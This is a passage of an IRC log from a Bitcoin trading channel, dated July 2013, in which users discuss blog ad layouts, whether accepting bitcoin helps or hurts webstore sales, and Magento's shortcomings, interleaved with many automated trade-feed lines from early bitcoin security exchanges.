i've noticed this, miost of the "real truth" sites have horrible ad arrangements. Jul 06 19:46:28 if you report that setup to google, they might get banned Jul 06 19:47:19 I'm not quite sure 2 banners, one on each side, is ground to a ban... Jul 06 19:47:40 you dont see the one in the middle also? Jul 06 19:47:41 The nature of the content or an excess of ad units can be, however, I believe. Jul 06 19:47:48 thats the same size as the left and right ones Jul 06 19:47:58 [HAVELOCK] [ASICM] 7 @ 0.039499 = 0.2765 BTC [+] Jul 06 19:48:19 The above the fold setup is one big ad for me Jul 06 19:48:27 i doubt anyone gives a shit about some obscure blogger that knows shit he doesn't understand. Jul 06 19:48:28 Oh, yes. It was little on first page load. Jul 06 19:48:36 Just a single, small text ad Jul 06 19:48:46 I refreshed tho, now it's a large unit. Jul 06 19:48:57 :) Jul 06 19:49:15 Still, ad units spliting the text isn't banned either per se... Jul 06 19:49:34 and I think they have a 3 google ads units per page limit... Jul 06 19:50:24 If, for example, they put an ad unit right over/under navigation links and styled them so they look similar/identical, that would be against their rules, tho Jul 06 19:50:30 maybe, been dealing with google alot before. They use every little error to fuck with you Jul 06 19:50:31 [BTCTC] [ASICMINER-PT] 2 @ 4.25 = 8.5 BTC [+] Jul 06 19:50:32 Or other similar confusing tactics Jul 06 19:54:10 "I’ve said it before and I’ll say it again; their are 3 main users of Bitcoin. The Money cleaners/tax evaders. Those involved in non-legal activities. The Greedy." I'll pick '"none of the above" for 200, Alex. Jul 06 19:58:00 [BTCTC] [TAT.ASICMINER] 3 @ 0.040422 = 0.1213 BTC [-] Jul 06 19:58:07 alex knows best. besides, no true scotsman. Jul 06 20:00:18 comments are gold Jul 06 20:00:20 "Note, they DO pay-out small transactions, in hope that you TRUST them with MORE MONEY. Them who? Russian and German Mafia? Potheads? Mexican Cartell?" Jul 06 20:00:34 can potheads even scam? Jul 06 20:01:47 [BTCTC] [DMS.PURCHASE] 20 @ 0.049083 = 0.9817 BTC [-] Jul 06 20:06:33 [BTCTC] [ASICMINER-PT] 1 @ 4.1713 BTC [-] Jul 06 20:06:51 [HAVELOCK] [ASICM] 100 @ 0.039499 = 3.9499 BTC [+] Jul 06 20:06:57 I think it's miss Cartell. Jul 06 20:07:30 [BTCTC] [ASICMINER-PT] 2 @ 4.16 = 8.32 BTC [-] Jul 06 20:08:13 [HAVELOCK] [ASICM] 175 @ 0.039499 = 6.9123 BTC [+] Jul 06 20:08:14 [HAVELOCK] [ASICM] 25 @ 0.0395 = 0.9875 BTC [+] Jul 06 20:10:05 scams are much more readily prosecuted when you can distract a sucker with multi-channel comms Jul 06 20:10:10 hence miss cartell Jul 06 20:10:57 hmm Jul 06 20:11:12 ugh that's not coming across correctly Jul 06 20:11:36 disregard. making more coffee. Jul 06 20:14:14 [BTCTC] [ASICMINER-PT] 1 @ 4.155002 BTC [-] Jul 06 20:14:16 [BTCTC] [ASICMINER-PT] 1 @ 4.15 BTC [-] Jul 06 20:15:14 [BTCTC] [AMC-PT] 2 @ 0.001801 = 0.0036 BTC [-] Jul 06 20:15:16 [BTCTC] [AMC-PT] 6 @ 0.001801 = 0.0108 BTC [-] Jul 06 20:15:17 [BTCTC] [AMC-PT] 4 @ 0.001801 = 0.0072 BTC [-] Jul 06 20:15:26 [BTCTC] [BITVPS] 10 @ 0.001799 = 0.018 BTC [-] Jul 06 20:15:38 [BTCTC] [AMC-PT] 100 @ 0.0018 = 0.18 BTC [-] Jul 06 20:16:10 [BTCTC] [AMC-PT] 25 @ 0.00177 = 0.0443 BTC [-] Jul 06 20:16:45 [BTCTC] [AMC-PT] 614 @ 0.00175 = 1.0745 BTC [-] Jul 06 20:17:11 [BTCTC] [AMC-PT] 300 @ 0.00175 = 0.525 BTC [-] Jul 06 20:21:07 [HAVELOCK] [ASICM] 50 @ 0.0395 = 1.975 BTC [+] Jul 06 20:24:20 [BTCTC] [DMS.SELLING] 68 @ 0.029979 = 2.0386 BTC [+] Jul 06 20:27:30 [BTCTC] [DMS.SELLING] 20 @ 0.02998 = 0.5996 BTC [+] Jul 06 20:27:32 [BTCTC] [DMS.SELLING] 11 @ 0.029988 = 0.3299 BTC [+] Jul 06 20:27:44 [BTCTC] [TAT.ASICMINER] 50 @ 0.040431 = 2.0216 BTC [+] Jul 06 20:27:46 [BTCTC] [TAT.ASICMINER] 20 @ 0.04043 = 0.8086 BTC [-] Jul 06 20:27:48 [BTCTC] [TAT.ASICMINER] 31 @ 0.040424 = 1.2531 BTC [-] Jul 06 20:27:50 [BTCTC] [TAT.ASICMINER] 20 @ 0.040404 = 0.8081 BTC [-] Jul 06 20:27:52 [BTCTC] [TAT.ASICMINER] 15 @ 0.0404 = 0.606 BTC [-] Jul 06 20:28:06 [BTCTC] [BFMINES] 1 @ 0.004 BTC [+] Jul 06 20:29:52 [BTCTC] [BFMINES] 410 @ 0.004 = 1.64 BTC [+] Jul 06 20:30:20 [BTCTC] [TAT.ASICMINER] 14 @ 0.04149 = 0.5809 BTC [+] Jul 06 20:32:56 [HAVELOCK] [ASICM] 9 @ 0.0395 = 0.3555 BTC [+] Jul 06 20:33:11 [HAVELOCK] [ASICM] 2 @ 0.03949801 = 0.079 BTC [-] Jul 06 20:33:13 [HAVELOCK] [ASICM] 11 @ 0.039498 = 0.4345 BTC [-] Jul 06 20:33:39 [BTCTC] [BITVPS] 47 @ 0.001601 = 0.0752 BTC [-] Jul 06 20:37:36 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1989 BTC [+] Jul 06 20:40:09 [BTCTC] [ASICMINER-PT] 2 @ 4.21 = 8.42 BTC [+] Jul 06 20:41:40 [HAVELOCK] [ASICM] 16 @ 0.0395 = 0.632 BTC [+] Jul 06 20:41:41 [HAVELOCK] [ASICM] 100 @ 0.0399 = 3.99 BTC [+] Jul 06 20:43:35 [MPEX] [S.MPOE] 26250 @ 0.00080776 = 21.2037 BTC [+] Jul 06 20:45:45 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199 BTC [+] Jul 06 20:47:53 [BTCTC] [B.YABMC] 23 @ 0.005501 = 0.1265 BTC [-] Jul 06 20:50:51 [BTCTC] [BITVPS] 201 @ 0.001799 = 0.3616 BTC [+] Jul 06 20:50:53 [BTCTC] [BITVPS] 100 @ 0.0018 = 0.18 BTC [+] Jul 06 20:51:13 [HAVELOCK] [HIM] 1 @ 0.3515 BTC [-] Jul 06 20:52:14 [BTCTC] [TAT.ASICMINER] 4 @ 0.041479 = 0.1659 BTC [-] Jul 06 20:56:18 [BTCTC] [TAT.ASICMINER] 20 @ 0.041479 = 0.8296 BTC [-] Jul 06 20:58:12 [BTCTC] [S.DICE-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 06 21:01:24 [BTCTC] [DMS.PURCHASE] 9 @ 0.049083 = 0.4417 BTC [-] Jul 06 21:04:33 [BTCTC] [TAT.ASICMINER] 6 @ 0.041479 = 0.2489 BTC [-] Jul 06 21:05:02 [MPEX] [S.MPOE] 12300 @ 0.00080814 = 9.9401 BTC [+] Jul 06 21:06:45 [BTCTC] [TAT.ASICMINER] 5 @ 0.041005 = 0.205 BTC [-] Jul 06 21:09:18 [BTCTC] [DMS.PURCHASE] 42 @ 0.049083 = 2.0615 BTC [-] Jul 06 21:11:12 [HAVELOCK] [ASICM] 2 @ 0.04129 = 0.0826 BTC [+] Jul 06 21:18:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.041006 BTC [+] Jul 06 21:20:20 [BTCTC] [BASIC-MINING] 3 @ 0.183898 = 0.5517 BTC [+] Jul 06 21:20:24 [BTCTC] [BASIC-MINING] 10 @ 0.183899 = 1.839 BTC [+] Jul 06 21:20:38 [BTCTC] [BASIC-MINING] 5 @ 0.1839 = 0.9195 BTC [+] Jul 06 21:20:43 [BTCTC] [GSDPT] 4 @ 0.002199 = 0.0088 BTC [-] Jul 06 21:23:04 [BTCTC] [ASICMINER-PT] 1 @ 4.16 BTC [-] Jul 06 21:23:08 [BTCTC] [ASICMINER-PT] 8 @ 4.151 = 33.208 BTC [-] Jul 06 21:23:13 [BTCTC] [ASICMINER-PT] 4 @ 4.15 = 16.6 BTC [-] Jul 06 21:23:17 [BTCTC] [ASICMINER-PT] 1 @ 4.15 BTC [-] Jul 06 21:23:22 [BTCTC] [ASICMINER-PT] 5 @ 4.142 = 20.71 BTC [-] Jul 06 21:23:25 [BTCTC] [ASICMINER-PT] 10 @ 4.13 = 41.3 BTC [-] Jul 06 21:33:07 [BTCTC] [ASICMINER-PT] 1 @ 4.128888 BTC [-] Jul 06 21:33:09 [BTCTC] [ASICMINER-PT] 1 @ 4.11 BTC [-] Jul 06 21:33:53 [BTCTC] [TAT.ASICMINER] 3 @ 0.041479 = 0.1244 BTC [+] Jul 06 21:38:34 [BTCTC] [AMC-PT] 2 @ 0.001998 = 0.004 BTC [+] Jul 06 21:39:06 [BTCTC] [AMC-PT] 48 @ 0.001999 = 0.096 BTC [+] Jul 06 21:39:50 [BTCTC] [AMC-PT] 5 @ 0.001999 = 0.01 BTC [+] Jul 06 21:40:34 [BTCTC] [AMC-PT] 1 @ 0.001999 BTC [+] Jul 06 21:40:42 [BTCTC] [S.DICE-PT] 376 @ 0.0025 = 0.94 BTC [+] Jul 06 21:40:44 [BTCTC] [S.DICE-PT] 4 @ 0.00252 = 0.0101 BTC [+] Jul 06 21:40:45 [BTCTC] [S.DICE-PT] 120 @ 0.00255 = 0.306 BTC [+] Jul 06 21:50:53 [BTCTC] [DMS.PURCHASE] 4 @ 0.049083 = 0.1963 BTC [-] Jul 06 21:53:45 [HAVELOCK] [ASICM] 1 @ 0.0408 BTC [-] Jul 06 21:54:24 [BTCTC] [DMS.MINING] 1 @ 0.019699 BTC [-] Jul 06 21:55:47 [MPEX] [S.MPOE] 20539 @ 0.00080776 = 16.5906 BTC [-] Jul 06 21:55:48 [MPEX] [S.MPOE] 3627 @ 0.00080756 = 2.929 BTC [-] Jul 06 21:57:27 [BTCTC] [GSDPT] 15 @ 0.002199 = 0.033 BTC [-] Jul 06 21:58:32 Plance crash in SF? Jul 06 21:59:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.041479 BTC [+] Jul 06 22:01:53 https://twitter.com/search?q=sfo&src=typd Jul 06 22:01:55 Twitter / Search - sfo Jul 06 22:02:12 [BTCTC] [BASIC-MINING] 7 @ 0.1839 = 1.2873 BTC [+] Jul 06 22:02:13 [BTCTC] [BASIC-MINING] 4 @ 0.184 = 0.736 BTC [+] Jul 06 22:02:14 [BTCTC] [BASIC-MINING] 10 @ 0.184 = 1.84 BTC [+] Jul 06 22:02:16 [BTCTC] [BASIC-MINING] 1 @ 0.185 BTC [+] Jul 06 22:02:17 [BTCTC] [BASIC-MINING] 1 @ 0.185 BTC [+] Jul 06 22:02:18 [BTCTC] [BASIC-MINING] 2 @ 0.186 = 0.372 BTC [+] Jul 06 22:02:40 Looks like I sold a little early on that one Jul 06 22:05:39 [BTCTC] [S.DICE-PT] 6 @ 0.00251 = 0.0151 BTC [-] Jul 06 22:11:32 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.004689 = 0.0141 BTC [+] Jul 06 22:13:56 [MPEX] [S.MPOE] 8923 @ 0.00080756 = 7.2059 BTC [-] Jul 06 22:13:58 [MPEX] [S.MPOE] 1614 @ 0.00080683 = 1.3022 BTC [-] Jul 06 22:13:59 [MPEX] [S.MPOE] 2391 @ 0.00080658 = 1.9285 BTC [-] Jul 06 22:14:32 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.004689 = 0.0422 BTC [+] Jul 06 22:14:35 [BTCTC] [S.DICE-PT] 3 @ 0.00243 = 0.0073 BTC [-] Jul 06 22:16:27 [BTCTC] [GSDPT] 3 @ 0.002199 = 0.0066 BTC [-] Jul 06 22:17:03 [BTCTC] [DMS.SELLING] 1 @ 0.030299 BTC [+] Jul 06 22:17:53 [BTCTC] [AMC-PT] 2 @ 0.001999 = 0.004 BTC [+] Jul 06 22:22:11 [MPEX] [S.MPOE] 4616 @ 0.00080814 = 3.7304 BTC [+] Jul 06 22:22:12 [MPEX] [S.MPOE] 5034 @ 0.00080891 = 4.0721 BTC [+] Jul 06 22:22:32 [BTCTC] [GSDPT] 2 @ 0.0021 = 0.0042 BTC [-] Jul 06 22:22:58 http://nerdr.com/bitcoin-exchange-scam-bitcoins-are-worthless/ << wasn't that nejc kodric? Jul 06 22:23:03 Bitcoin Exchange Scam – Bitcoins Are Now Worthless | NERDr.com Jul 06 22:23:50 not even sure who that is Jul 06 22:25:49 lol what a company: https://twitter.com/btclondon/status/351988744968089601/photo/1 Jul 06 22:26:25 [HAVELOCK] [ASICM] 50 @ 0.040611 = 2.0306 BTC [-] Jul 06 22:27:03 i dun see no skateboards Jul 06 22:31:54 the rising stars of the ecosystem what ? Jul 06 22:32:09 is this from the first ever second conference in london ? Jul 06 22:32:57 no, from this recent one. got it from nejc's twitter Jul 06 22:34:17 [BTCTC] [TAT.ASICMINER] 4 @ 0.041479 = 0.1659 BTC [+] Jul 06 22:36:07 [BTCTC] [S.DICE-PT] 12 @ 0.00251 = 0.0301 BTC [+] Jul 06 22:46:30 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.00464 = 0.232 BTC [-] Jul 06 22:48:09 [BTCTC] [ASICMINER-PT] 1 @ 4.13 BTC [+] Jul 06 23:00:45 [HAVELOCK] [ASICM] 1 @ 0.041 BTC [+] Jul 06 23:04:12 http://i-like-pancakes.tumblr.com/post/54092895998/what-god-modding-looks-like Jul 06 23:04:18 funniest shit i read all day : rp butthurt. Jul 06 23:04:23 [BTCTC] [BFMINES] 4 @ 0.004 = 0.016 BTC [+] Jul 06 23:04:34 [HAVELOCK] [KCIM] 10 @ 0.8 = 8 BTC [-] Jul 06 23:04:44 [BTCTC] [BFMINES] 3 @ 0.00362 = 0.0109 BTC [-] Jul 06 23:04:47 [BTCTC] [BFMINES] 1 @ 0.00361 BTC [-] Jul 06 23:04:55 [BTCTC] [AMC-PT] 4 @ 0.001999 = 0.008 BTC [+] Jul 06 23:05:00 [MPEX] [S.MPOE] 9273 @ 0.00080891 = 7.501 BTC [+] Jul 06 23:06:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.041479 BTC [+] Jul 06 23:07:08 [BTCTC] [TAT.ASICMINER] 10 @ 0.041479 = 0.4148 BTC [+] Jul 06 23:16:05 [BTCTC] [BFMINES] 150 @ 0.004 = 0.6 BTC [+] Jul 06 23:18:41 [BTCTC] [BTC-BOND] 9 @ 0.01 = 0.09 BTC [+] Jul 06 23:27:40 [BTCTC] [ASICMINER-PT] 1 @ 4.1299 BTC [-] Jul 06 23:30:25 [HAVELOCK] [ASICM] 1 @ 0.04099 BTC [-] Jul 06 23:32:31 [BTCTC] [ASICMINER-PT] 1 @ 4.1299 BTC [-] Jul 06 23:34:15 [BTCTC] [ASICMINER-PT] 1 @ 4.13 BTC [+] Jul 06 23:41:33 [HAVELOCK] [ASICM] 12 @ 0.04099 = 0.4919 BTC [-] Jul 06 23:59:29 [BTCTC] [DMS.MINING] 1 @ 0.01902 BTC [-] Jul 06 23:59:31 [BTCTC] [DMS.MINING] 1 @ 0.01901 BTC [-] Jul 06 23:59:33 [BTCTC] [DMS.MINING] 15 @ 0.019 = 0.285 BTC [-] Jul 06 23:59:33 [BTCTC] [DMS.MINING] 75 @ 0.019 = 1.425 BTC [-] Jul 07 00:00:21 [HAVELOCK] [ASICM] 4 @ 0.040501 = 0.162 BTC [-] Jul 07 00:02:17 [BTCTC] [BASIC-MINING] 15 @ 0.186 = 2.79 BTC [+] Jul 07 00:02:19 [HAVELOCK] [ASICM] 1 @ 0.04098 BTC [+] Jul 07 00:02:33 [BTCTC] [DMS.SELLING] 41 @ 0.030299 = 1.2423 BTC [+] Jul 07 00:02:37 [BTCTC] [DMS.SELLING] 20 @ 0.0303 = 0.606 BTC [+] Jul 07 00:02:39 [BTCTC] [DMS.SELLING] 9 @ 0.03049 = 0.2744 BTC [+] Jul 07 00:02:41 [BTCTC] [DMS.SELLING] 2 @ 0.030497 = 0.061 BTC [+] Jul 07 00:02:42 [BTCTC] [DMS.SELLING] 15 @ 0.030499 = 0.4575 BTC [+] Jul 07 00:04:00 [BTCTC] [S.MPOE-PT] 109 @ 0.00099 = 0.1079 BTC [-] Jul 07 00:04:42 [BTCTC] [DMS.SELLING] 17 @ 0.031 = 0.527 BTC [+] Jul 07 00:05:22 [BTCTC] [BITVPS] 47 @ 0.001899 = 0.0893 BTC [+] Jul 07 00:12:16 [HAVELOCK] [ASICM] 1 @ 0.0409 BTC [-] Jul 07 00:12:50 [BTCTC] [BMF] 4 @ 0.034 = 0.136 BTC [-] Jul 07 00:13:04 ;;nethash Jul 07 00:13:05 175663.636948 Jul 07 00:13:12 ;;bcstats Jul 07 00:13:14 Current Blocks: 245169 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 782 blocks | Next Difficulty In About: 4 days, 3 hours, 49 minutes, and 47 seconds | Next Difficulty Estimate: 25127864.7628 | Estimated Percent Change: 17.77585 Jul 07 00:15:09 [MPEX] [S.MPOE] 5424 @ 0.00080573 = 4.3703 BTC [-] Jul 07 00:23:21 [BTCTC] [DMS.MINING] 25 @ 0.019 = 0.475 BTC [-] Jul 07 00:29:04 [HAVELOCK] [ASICM] 1 @ 0.040958 BTC [+] Jul 07 00:29:05 [HAVELOCK] [ASICM] 1 @ 0.040959 BTC [+] Jul 07 00:29:46 [MPEX] [S.MPOE] 5273 @ 0.00080891 = 4.2654 BTC [+] Jul 07 00:29:49 [MPEX] [S.MPOE] 8300 @ 0.00080901 = 6.7148 BTC [+] Jul 07 00:29:51 [MPEX] [S.MPOE] 1060 @ 0.00080941 = 0.858 BTC [+] Jul 07 00:29:56 [BTCTC] [B.YABMC] 1 @ 0.0055 BTC [-] Jul 07 00:30:59 [BTCTC] [TAT.VIRTUALMINE] 31 @ 0.004296 = 0.1332 BTC [-] Jul 07 00:31:26 [BTCTC] [GSDPT] 1 @ 0.0021 BTC [-] Jul 07 00:31:28 [BTCTC] [BITVPS] 1 @ 0.001651 BTC [-] Jul 07 00:32:21 [BTCTC] [AMC-PT] 3 @ 0.00168 = 0.005 BTC [-] Jul 07 00:32:23 [BTCTC] [AMC-PT] 50 @ 0.00168 = 0.084 BTC [-] Jul 07 00:33:17 [BTCTC] [TAT.ASICMINER] 10 @ 0.041006 = 0.4101 BTC [-] Jul 07 00:34:44 [BTCTC] [AMC-PT] 9 @ 0.00162 = 0.0146 BTC [-] Jul 07 00:36:05 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004689 BTC [+] Jul 07 00:36:36 [BTCTC] [AMC-PT] 13 @ 0.00162 = 0.0211 BTC [-] Jul 07 00:38:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.041479 BTC [+] Jul 07 00:43:35 [HAVELOCK] [ASICM] 1 @ 0.040959 BTC [+] Jul 07 00:46:52 [BTCTC] [GSDPT] 3 @ 0.00191 = 0.0057 BTC [-] Jul 07 00:52:54 [BTCTC] [DMS.PURCHASE] 107 @ 0.049083 = 5.2519 BTC [-] Jul 07 00:56:27 [BTCTC] [S.DICE-PT] 1 @ 0.00243 BTC [-] Jul 07 00:56:56 [BTCTC] [BFMINES] 1 @ 0.004 BTC [+] Jul 07 00:59:47 [BTCTC] [DMS.PURCHASE] 26 @ 0.049083 = 1.2762 BTC [-] Jul 07 01:02:39 [MPEX] [S.MPOE] 4641 @ 0.00080941 = 3.7565 BTC [+] Jul 07 01:03:52 hey has anyone done a study about the marketing impact that offering bitcoin payments in webstores has on traditional payments? Jul 07 01:04:27 one basic question - when would offering bitcoin tend to scare off regular customers? Jul 07 01:05:05 and vice versa - when would regular customers be more likely to purchase from you because they see that you also take bitcoin? Jul 07 01:06:29 I'm sure similar questions have been asked in the past by vendors considering adding, for example, a paypal payment option to their webstore Jul 07 01:07:08 or by traditional stored considering accepting credit card payment in addition to cash payments Jul 07 01:08:05 in the last case, at some point, store owners may have feared that accepting credit cards might not bring enough customers to justify the cost of the machine Jul 07 01:09:48 in the case of bitcoin, in the current atmosphere, web store owners might worry that adding bitcoin payment options might de-legitimize their business in the eyes of many customers Jul 07 01:10:15 this is because many people are afraid, mistrusting, or simply ignorant of bitcoin Jul 07 01:10:18 [BTCTC] [MININGCO.ETF] 1 @ 1.42 BTC [+] Jul 07 01:14:26 do you think so? i'd say it depends on the website. if it's filled with hundreds of shady payment choices, it's not good anyway, but i see no reason to not accept bitcoin. most people don't know about it and the worst reaction which could happen might be "what? bitcoin? isn't that the internet currency? wow.. it really gets attention nowadays" Jul 07 01:14:46 yeah Jul 07 01:14:52 but i can't supply hard facts though :/ Jul 07 01:15:19 there are some bigger players already accepting.. like wordpress Jul 07 01:15:23 and spotify soon Jul 07 01:15:56 if your customers are techies, there's a good chance that adding that bitcoin payment button will increase customer conversion rates even in customers that don't use bitcoin Jul 07 01:15:58 cads i really have no idea who'd be repelled by bitcoin Jul 07 01:16:59 [MPEX] [S.MPOE] 11793 @ 0.000807 = 9.517 BTC [-] Jul 07 01:17:01 [MPEX] [S.MPOE] 6676 @ 0.00080573 = 5.3791 BTC [-] Jul 07 01:17:05 [MPEX] [S.MPOE] 5400 @ 0.00080492 = 4.3466 BTC [-] Jul 07 01:17:07 [MPEX] [S.MPOE] 7830 @ 0.00080364 = 6.2925 BTC [-] Jul 07 01:17:44 cads do you plan integrating bitcoin or just asking out of curiosity? Jul 07 01:17:47 [MPEX] [S.MPOE] 9200 @ 0.00080347 = 7.3919 BTC [-] Jul 07 01:17:53 the former Jul 07 01:18:06 mircea_popescu: there is a large fraction of regular people that are instinctively mistrustful of bitcoin - there has been talk of people using it for tax evasion and money laundering, there is bitcoin's use in the silk road that leaves a bad taste in most people's mouths. Jul 07 01:18:46 worst, there has been talk about government sanctions of the digital currency - lots of regular late adopters and conservative types instinctively avoid it Jul 07 01:19:31 but then a webstore catering to early adopters, techies, and people with an anarchocapitalist bent, I'm sure bitcoin support can be a boon. Jul 07 01:19:55 *for a webstore Jul 07 01:20:28 and there's that "it's just ponzi" kind Jul 07 01:20:46 I'm wondering if there's any business data available here. Jul 07 01:21:15 I have an idea of how a webstore could test what effect bitcoin support has on its conversion rate Jul 07 01:21:41 and this could be fairly discreet Jul 07 01:21:57 a/b split ? Jul 07 01:22:03 simply give a small percentage of your customers the option to use bitcoin Jul 07 01:22:13 i doubt that thing is measurable Jul 07 01:22:13 and analyze the conversion rate Jul 07 01:22:13 counting referrals from bitcoin-related sites? Jul 07 01:22:24 anyway, i've yet to comprehend this. i think paying attention to what people say (like on their own shitty blogs) is a waste. Jul 07 01:22:39 [BTCTC] [TAT.ASICMINER] 6 @ 0.04148 = 0.2489 BTC [+] Jul 07 01:22:40 nobody will NOT use a service they were going to use because there's more ways to pay than the one they use Jul 07 01:22:45 it's not yet happened, this. Jul 07 01:22:57 okay, so Jul 07 01:22:59 like, not go to a restaurant because they take both visa and maestro and you hjate maestro ? lol. Jul 07 01:23:06 your store says "we now take drugs as payment!" Jul 07 01:23:26 ... Jul 07 01:24:03 that's hardly comparable Jul 07 01:24:06 indeed. Jul 07 01:24:14 to my thought, this could easily reduce the legitimacy of your store Jul 07 01:24:18 the "ponzi" people are vocal, but very few Jul 07 01:24:20 i mean sure there's idiots boycotting this or that because they kill bunnies or w/e. Jul 07 01:24:36 cads news reports aren't that bad, are they? Jul 07 01:24:55 i doubt anyone cares. the recent internet bullshit trying to bother some restaurant resulted in more customers rather than less. Jul 07 01:26:43 emptyeddepended: I dunno, there was talk about BTC receiving scrutiny from a US financial regulatory body recently Jul 07 01:26:56 mt gox had one of its stateside accounts frozen, or something Jul 07 01:27:45 there was much bigger talk about that winklevoess etf nonsense Jul 07 01:27:53 My point being that the average person who has a 50% chance of not having hear about bitcoin at all, will, if you ask them about it, with 80% probability tell you that what they've heard about it is worrying Jul 07 01:28:09 at least here in the states, the average person may be more optimistic in europe Jul 07 01:28:26 cads, you're now just pulling numbers out of the ass Jul 07 01:28:40 we have google trends and other stuff you can actually use Jul 07 01:28:56 instead of worrying here ;) Jul 07 01:29:04 jurov: who's worried, lol Jul 07 01:29:52 how does google trends help in this matter? Jul 07 01:30:11 google news + "bitcoin" would do though :) Jul 07 01:30:32 it tries to show most influential news. you can check whether they are pos or neg Jul 07 01:30:42 +1 for split testing Jul 07 01:30:51 i see Jul 07 01:31:03 I'm simply proposing an experiment, and suggesting that my real life experience interviewing various people (people who are _not_, as a rule, very connected to the social network sphere or the blogsphere) suggests that BTC is a point of contention for many people. Jul 07 01:31:23 this is not a bad thing, don't treat me as if I'm trying to rain on some parade Jul 07 01:31:49 split test all the things Jul 07 01:31:53 data is the ultimate arbiter Jul 07 01:32:01 I agree there Jul 07 01:32:04 no, don''t get me wrong. i honor your opinion, but i for myself are super bullish and optimistic Jul 07 01:32:05 point of contention is different than worrying Jul 07 01:32:22 let's reframe then, shall we? Jul 07 01:32:26 sure Jul 07 01:32:34 here is another scenario: let's say people do think bitcoin is bad. what do you think would happen, if amazon.com announces they start accepting btc? Jul 07 01:32:36 has anyone tested impact of accepting btc on conversion rates? Jul 07 01:33:15 kim dotcom? Jul 07 01:33:58 so far namecheap is taking btc, i have yet to hear any bitchin'. Jul 07 01:34:10 or wordpress Jul 07 01:34:12 and for that matter wordpress Jul 07 01:34:25 so yeah, you're hardly in the weird forrest of novelty here. Jul 07 01:34:34 in wp case the buzz looked overwhelmingly positive Jul 07 01:34:42 Dude Jul 07 01:34:47 ;;ticker Jul 07 01:34:48 MtGox BTCUSD ticker | Best bid: 69.79976, Best ask: 70.35900, Bid-ask spread: 0.55924, Last trade: 70.36499, 24 hour volume: 41641.06437256, 24 hour low: 66.81190, 24 hour high: 74.99997, 24 hour vwap: 70.17329 Jul 07 01:34:52 what am I missing Jul 07 01:35:09 out of the weird forest of novelty doesn't mean anything when trying to figure out affect of widget implementation on bounce rates Jul 07 01:35:10 I'm sure that various hybric bitcoin/traditional vendors have done that in a phase before adding bitcoin support, and I'm willing to hazard it generally the experiment is a positive for most vendors that even considers adding BTC support Jul 07 01:35:58 s/hybric/hybrid Jul 07 01:37:12 so far I've heard some rhetoric and no numbers Jul 07 01:37:26 numbers will be nice, I think we'll all agree Jul 07 01:37:30 you heard some names, try asking there Jul 07 01:37:37 cads where are you considering implementing? Jul 07 01:37:37 [BTCTC] [TAT.ASICMINER] 50 @ 0.041009 = 2.0505 BTC [-] Jul 07 01:37:38 [BTCTC] [TAT.ASICMINER] 20 @ 0.041008 = 0.8202 BTC [-] Jul 07 01:37:40 [BTCTC] [TAT.ASICMINER] 5 @ 0.041005 = 0.205 BTC [-] Jul 07 01:37:42 [BTCTC] [TAT.ASICMINER] 80 @ 0.0405 = 3.24 BTC [-] Jul 07 01:37:44 [BTCTC] [TAT.ASICMINER] 5 @ 0.040404 = 0.202 BTC [-] Jul 07 01:37:46 [BTCTC] [TAT.ASICMINER] 10 @ 0.040402 = 0.404 BTC [-] Jul 07 01:37:48 [BTCTC] [TAT.ASICMINER] 65 @ 0.0404 = 2.626 BTC [-] Jul 07 01:37:50 [BTCTC] [TAT.ASICMINER] 100 @ 0.0402 = 4.02 BTC [-] Jul 07 01:37:52 [BTCTC] [TAT.ASICMINER] 84 @ 0.04012 = 3.3701 BTC [-] Jul 07 01:37:52 [BTCTC] [TAT.ASICMINER] 10 @ 0.040112 = 0.4011 BTC [-] Jul 07 01:37:54 [BTCTC] [TAT.ASICMINER] 83 @ 0.04011 = 3.3291 BTC [-] Jul 07 01:37:55 [BTCTC] [TAT.ASICMINER] 238 @ 0.0401 = 9.5438 BTC [-] Jul 07 01:38:24 and maybe also ask yourself if your service will be used by people who can't/don't want to use credit card or paypal Jul 07 01:38:37 benkay: an NFC tag webstore that also takes bitcoin Jul 07 01:39:12 Biggest tech site in norway accepts bitcoin for "premium" account Jul 07 01:39:17 hardware.no Jul 07 01:39:25 suprised me :) Jul 07 01:39:35 (just because lots of people do a thing does not mean that it is a good idea. data answers that.) Jul 07 01:39:39 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004689 BTC [+] Jul 07 01:39:44 cads: can I get a link? Jul 07 01:39:46 the idea is just, you know, offer bitcoin payment as something to differentiate us from other stores selling NFC tags Jul 07 01:40:11 i'm sorry, i mentioned spotify, but what i meant was shopify... christian@shopify.com was responsive, when i asked for confirmation of a planned bitcoin integration Jul 07 01:40:49 benkay: right now I just have some tags in the mail, that I'll be putting up on an associate's existing ebay store Jul 07 01:41:18 I imagine eBay won't be terribly pleased to hear that you accept payment methods they don't get a slice of... Jul 07 01:41:19 ;) Jul 07 01:42:04 benkay: I don't think they'll have much room to complain, as long as I don't link customers from the ebay store to my store Jul 07 01:42:48 +1 Jul 07 01:42:54 for now I'm just playing around with webstore techs - thinking of magento, and, funny enough, shopify :) Jul 07 01:43:18 cads, that could be successful if more btc-related service, such as (example idea) nfc tags with vanity addresses Jul 07 01:44:43 sites like tagstand.com have been successful (I don't know how successful) offering an inventory of NFC tags at low volume/high cost, at the same time as offering a free NFC based task manager app Jul 07 01:45:10 actually, tag stand is the only example I can cite, here in the US Jul 07 01:45:38 i recommend against magento Jul 07 01:45:49 but have nothing to suggest in its place :( Jul 07 01:46:00 sure, what are you thoughts behind that? Jul 07 01:46:18 well, my advice may be premature optimization for your use case Jul 07 01:46:49 why recommend against magento, I mean? Jul 07 01:48:09 so far all I've done is.. download a magento virtual machine Jul 07 01:48:15 i just wrapped an epic migration from magento 1.3 community to enterprise Jul 07 01:48:28 and aside from the conceived-in-hell EAV data store they fucked up Jul 07 01:48:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.041895 = 0.1257 BTC [+] Jul 07 01:48:36 it just falls over on basic stuff like search Jul 07 01:49:04 plus php is not a great choice for us-based dev teams Jul 07 